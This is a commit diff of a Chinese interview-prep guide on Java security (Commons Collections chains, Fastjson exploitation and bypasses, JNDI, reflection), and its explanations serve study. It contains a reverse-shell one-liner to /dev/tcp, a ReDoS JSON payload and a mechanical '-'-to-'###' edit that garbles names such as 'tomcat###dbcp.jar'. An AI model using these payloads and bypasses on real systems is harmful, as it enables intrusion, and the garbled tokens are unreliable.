Demodd
diff --git a/‎auto.py‎
Lines changed: 1 addition & 1 deletion b/‎auto.py‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎cc/README.md‎
Lines changed: 8 additions & 8 deletions b/‎cc/README.md‎
Lines changed: 8 additions & 8 deletions
diff --git a/‎fastjson/README.md‎
Lines changed: 15 additions & 15 deletions b/‎fastjson/README.md‎
Lines changed: 15 additions & 15 deletions
diff --git a/‎java/README.md‎
Lines changed: 16 additions & 16 deletions b/‎java/README.md‎
Lines changed: 16 additions & 16 deletions
@@ -13,7 +13,7 @@
         temp_lines = temp.readlines()
         total = 0
         for q in temp_lines:
-            if q.startswith("-"):
+            if q.startswith("###"):
                 total = total + 1
         p = line.split("-")[0]
         s = line.split("个]")[1]
 
@@ -1,6 +1,6 @@
 ## CC
 
-- 谈下CC链中三个重要的`Transformer`（★★★）
+### 谈下CC链中三个重要的`Transformer`（★★★）
 
 `ConstantTransformer`类的`transform`方法直接返回传入的类对象
 
@@ -12,15 +12,15 @@
 
 
 
-- 谈谈CC1（★★★）
+### 谈谈CC1（★★★）
 
 原理是`LazyMap.get`可以触发构造的`Transformer`链的`transform`方法导致`RCE`
 
 基于动态代理触发的`LazyMap.get`，在`AnnotationInvocationHanlder`中的`invoke`方法中存在`Map.get`操作
 
 
 
-- 谈谈CC2（★★★）
+### 谈谈CC2（★★★）
 
 该链用到`TemplatesImpl`类，生成恶意的字节码实例化
 
@@ -32,37 +32,37 @@
 
 
 
-- 谈谈CC3（★★★）
+### 谈谈CC3（★★★）
 
 该链用到`TemplatesImpl`类，生成恶意的字节码实例化
 
 仍然是基于动态代理和`LazyMap.get`触发`InstantiateTransformer`的`transform`方法导致`RCE`
 
 
 
-- 谈谈CC4（★★★）
+### 谈谈CC4（★★★）
 
 和CC2链一致，不过触发时候不是`InvokerTransformer`而是`InstantiateTransformer`类直接实例化`TrAXFilter`子类执行`<init>/<clinit>`导致`RCE`
 
 
 
-- 谈谈CC5（★★★）
+### 谈谈CC5（★★★）
 
 还是基于`LazyMap.get`触发的，不过没有动态代理，是通过`BadAttributeValueExpException.readObject()`调用`TiedMapEntry.toString()`
 
 在`TiedMapEntry.getValue()`中存在`Map.get`导致`LazyMap.get`触发`transform`
 
 
 
-- 谈谈CC6（★★★）
+### 谈谈CC6（★★★）
 
 还是基于`LazyMap.get`触发的，通过`HashMap.readObject()`到达`HashMap.hash()`方法，由于key是`TiedMapEntry`所以调用`TiedMapEntry.hashCode()`
 
 而`hashCode`方法会调用到`TiedMapEntry.getValue()`方法，由于`Map.get`导致`LazyMap.get`触发`transform`
 
 
 
-- 谈谈CC7（★★★）
+### 谈谈CC7（★★★）
 
 还是基于`LazyMap.get`触发的，通过`Hashtable.readObject()`触发了key的`equals`方法，跟入`AbstractMap.equals`方法
 
 
@@ -1,30 +1,30 @@
 # Fastjson
 
-- 使用`JSON.parse()`和`JSON.parseObject()`的不同（★）
+### 使用`JSON.parse()`和`JSON.parseObject()`的不同（★）
 
 前者会在JSON字符串中解析字符串获取`@type`指定的类，后者则会直接使用参数中的`class`，并且对应类中所有`getter`和`setter`都会被调用
 
 
 
-- 什么情况下反序列化过程会反射调用`getter`（★）
+### 什么情况下反序列化过程会反射调用`getter`（★）
 
 符合`getter`规范的情况且不存在`setter`
 
 
 
-- 如果不存在`setter`和`getter`方法可以反射设置值吗（★）
+### 如果不存在`setter`和`getter`方法可以反射设置值吗（★）
 
 需要服务端开启`Feature.SupportNonPublicFiel`参数，实战无用
 
 
 
-- Fastjson在反序列化`byte[]`类型的属性时会做什么事情（★）
+### Fastjson在反序列化`byte[]`类型的属性时会做什么事情（★）
 
 将会在反序列化时候进行`base64`编码
 
 
 
-- 谈谈常见的几种Payload（★★★）
+### 谈谈常见的几种Payload（★★★）
 
 首先是最常见的`JdbcRowSetImpl`利用`JDNI`注入方式触发，需要出网
 
@@ -36,21 +36,21 @@
 
 
 
-- 是否存在不出网的Fastjson利用方式（★★★）
+### 是否存在不出网的Fastjson利用方式（★★★）
 
 第一种是`TemplatesImpl`类加载字节码做到不出网利用，但需要开启特殊参数实战鸡肋
 
-第二种方式是服务端存在在`tomcat-dbcp.jar`情况下，使用`BasicDataSource`配合`BCEL`可实现不出网`RCE`
+第二种方式是服务端存在在`tomcat###dbcp.jar`情况下，使用`BasicDataSource`配合`BCEL`可实现不出网`RCE`
 
 
 
-- 谈谈1.2.47版本之前各个小版本的绕过（★★★）
+### 谈谈1.2.47版本之前各个小版本的绕过（★★★）
 
 首先是利用解析问题可以加括号或大写L绕过低版本，高版本利用了哈希黑名单，之所以要哈希是因为防止黑客进行分析。但黑名单还是被破解了，有师傅找到可以绕过了类。在1.2.47版本中利用缓存绕过
 
 
 
-- Fastjson应该如何探测（★★）
+### Fastjson应该如何探测（★★）
 
 使用`dnslog`做检测是最常见的方式，利用`java.net.Inet[4][6]Address`或`java.net.InetSocketAddress`或`java.net.URL`类，之所以使用这三个因为不在黑名单中，可以直接检测
 
@@ -60,7 +60,7 @@
 
 
 
-- 谈谈1.2.68版本的绕过（★★）
+### 谈谈1.2.68版本的绕过（★★）
 
 1.2.68之前的66和67可以利用`JNDI`相关类，比如`Shiro`的`JndiObjectFactory`和`ignite`项目的类
 
@@ -72,7 +72,7 @@
 
 
 
-- 谈谈Fastjson的WAF Bypass手段（★★★）
+### 谈谈Fastjson的WAF Bypass手段（★★★）
 
 Fastjson默认会去除键值外的空格、\b、\n、\r、\f等字符，同时还会自动将键值进行`unicode`与十六进制解码
 
@@ -82,14 +82,14 @@ Fastjson默认会去除键值外的空格、\b、\n、\r、\f等字符，同时
 
 
 
-- 除了RCE还能有什么利用（★★★）
+### 除了RCE还能有什么利用（★★★）
 
 信息泄露或者ReDoS，参考下方Payload
 
 ```json
 {
     "regex":{
-        "$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"
+        "$ref":"$[\blue = /\^[a###zA###Z]+(([a###zA###Z ])?[a###zA###Z]*)*$/]"
     },
     "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
 }
@@ -108,12 +108,12 @@ Fastjson默认会去除键值外的空格、\b、\n、\r、\f等字符，同时
 
 
 
-- 是否了解自动挖掘Fastjson利用链的方式（★★★★）
+### 是否了解自动挖掘Fastjson利用链的方式（★★★★）
 
 利用链主要集中在`getter`和`setter`方法中，如果`getter`或者`setter`的方法中存在一些危险操作比如`JNDI`查询，如果参数可控就可以导致`JNDI`注入
 
 简单来说，直接搜对应项目中`JNDI`的`lookup`方法，可以基于`ASM`解压分析`Jar`包，这种半自动结合人工审核的方式其实很好用（之前挖到过几个）
 
-进一步来说，全自动的方式可以使用`codeql`或`gadget-inspector`工具来做，主要是加入了污点传递，分析`getter/setter`参数如何传递到`lookup`
+进一步来说，全自动的方式可以使用`codeql`或`gadget###inspector`工具来做，主要是加入了污点传递，分析`getter/setter`参数如何传递到`lookup`
 
 关闭全自动分析原理，一般面试官不会问太深入，因为可能涉及到静态分析相关的技术，普通安服崽的面试不会太过深入，如果是实验室可能需要再学习一下
@@ -1,12 +1,12 @@
 ## JDK
 
-- Java反射做了什么事情（★）
+### Java反射做了什么事情（★）
 
 反射是根据字节码获得类信息或调用方法。从开发者角度来讲，反射最大的意义是提高程序的灵活性。Java本身是静态语言，但反射特性允许运行时动态修改类定义和属性等，达到了动态的效果
 
 
 
-- Java反射可以修改Final字段嘛（★★）
+### Java反射可以修改Final字段嘛（★★）
 
 可以做到，参考以下代码
 
@@ -20,7 +20,7 @@ field.set(null, newValue);
 
 
 
-- 传统的反射方法加入黑名单怎么绕（★★★）
+### 传统的反射方法加入黑名单怎么绕（★★★）
 
 可以使用的类和方法如下（参考三梦师傅）
 
@@ -38,7 +38,7 @@ JSClassLoader.newInstance
 
 
 
-- Java中可以执行反弹shell的命令吗（★★）
+### Java中可以执行反弹shell的命令吗（★★）
 
 可以执行，但需要对命令进行特殊处理。例如直接执行这样的命令：`bash -i >& /dev/tcp/ip/port 0>&1`会失败，简单来说因为`>`符号是重定向，如果命令中包含输入输出重定向和管道符，只有在`bash`下才可以，使用Java执行这样的命令会失败，所以需要加入`Base64`
 
@@ -77,23 +77,23 @@ public static String getPowershellCommand(String cmd) {
 
 
 
-- 假设`Runtime.exec`加入黑名单还有什么方式执行命令（★★）
+### 假设`Runtime.exec`加入黑名单还有什么方式执行命令（★★）
 
 其实这个问题有点类似`JSP Webshell`免杀
 
 大致方法有这些：使用基本的反射，ProcessImpl和ProcessBuilde，JDNI和LDAP注入，TemplatesImpl，BCEL，BeansExpression，自定义ClassLoader，动态编译加载，ScriptEngine，反射调用一些native方法，各种EL（SPEL和Tomcat EL等）
 
 
 
-- RMI和LDAP类型的JNDI注入分别在哪个版本限制（★）
+### RMI和LDAP类型的JNDI注入分别在哪个版本限制（★）
 
 RMI的JNDI注入在8u121后限制，需要手动开启`com.sun.jndi.rmi.object.trustURLCodebase`属性
 
 LDAP的JNDI注入在8u191后限制，需要开启`com.sun.jndi.ldap.object.trustURLCodebase`属性
 
 
 
-- RMI和LDAP的限制版本分别可以怎样绕过（★★）
+### RMI和LDAP的限制版本分别可以怎样绕过（★★）
 
 RMI的限制是限制了远程的工厂类而不限制本地，所以用本地工厂类触发
 
@@ -103,7 +103,7 @@ LDAP的限制中不对`javaSerializedData`验证，所以可以打本地`gadget`
 
 
 
-- 谈谈TemplatesImpl这个类（★★）
+### 谈谈TemplatesImpl这个类（★★）
 
 这个类本身是JDK中XML相关的类，但被很多`Gadget`拿来用
 
@@ -122,7 +122,7 @@ TemplatesImpl.getOutputProperties()
 
 
 
-- 了解BCEL ClassLoader吗（★）
+### 了解BCEL ClassLoader吗（★）
 
 BCEL的全名应该是Apache Commons BCEL，属于Apache Commons项目下的一个子项目
 
@@ -132,7 +132,7 @@ BCEL的全名应该是Apache Commons BCEL，属于Apache Commons项目下的一
 
 
 
-- 谈谈7U21反序列化（★★★★★）
+### 谈谈7U21反序列化（★★★★★）
 
 从`LinkedHashSet.readObject`开始，找到父类`HashSet.readObject`方法，其中包含`HashMap`的类型转换以及`HashMap.put`方法，跟入`HashMap.put`其中对`key`与已有`key`进行`equals`判断，这个`equals`方法是触发后续利用链的关键。但`equals`方法的前置条件必须满足
 
@@ -180,7 +180,7 @@ LinkedHashSet.readObject()
 
 
 
-- 谈谈8U20反序列化（★★★★★）
+### 谈谈8U20反序列化（★★★★★）
 
 这是7U21修复的绕过
 
@@ -190,13 +190,13 @@ LinkedHashSet.readObject()
 
 
 
-- 了解缩小反序列化Payload的手段吗（★★★）
+### 了解缩小反序列化Payload的手段吗（★★★）
 
 首先最容易的方案是使用Javassist生成字节码，这种情况下生成的字节码较小。进一步可以用ASM删除所有的LineNumber指令，可以更小一步。最终手段可以分块发送多个Payload最后合并再用URLClassLoader加载
 
 
 
-- 谈谈实战中命令执行有哪些回显的办法（★★★★）
+### 谈谈实战中命令执行有哪些回显的办法（★★★★）
 
 首先想到的办法是`dnslog`等技术进行外带，但必须出网，有限制
 
@@ -210,23 +210,23 @@ Y4er师傅提到的自定义类加载器配合RMI的一种方式
 
 
 
-- 有没有了解过针对`linux`的通杀的回显方式（★★★★）
+### 有没有了解过针对`linux`的通杀的回显方式（★★★★）
 
 获取本次`http`请求用到`socket`的文件描述符，然后往文件描述符里写命令执行的结果
 
 但鸡肋的地方在于需要确定源端口，才可以使用命令查到对应的文件描述符，存在反代可能有问题
 
 
 
-- 是否存在针对`windows`的通杀的回显方式（★★★★）
+### 是否存在针对`windows`的通杀的回显方式（★★★★）
 
 原理类似`linux`的通杀回显，在`windows`中`nio/bio`中有类似于`linux`文件描述符这样的句柄文件
 
 遍历`fd`反射创建对应的文件描述符，利用`sun.nio.ch.Net#remoteAddress`确认文件描述符有效性，然后往里面写数据实现回显
 
 
 
-- 是否了解JDBC Connection URL攻击（★★★）
+### 是否了解JDBC Connection URL攻击（★★★）
 
 果我们可以控制`JDBC URI`就可将`JDBC`连接地址指向攻击者事先准备好的恶意服务器，这个服务器可以返回恶意的序列化数据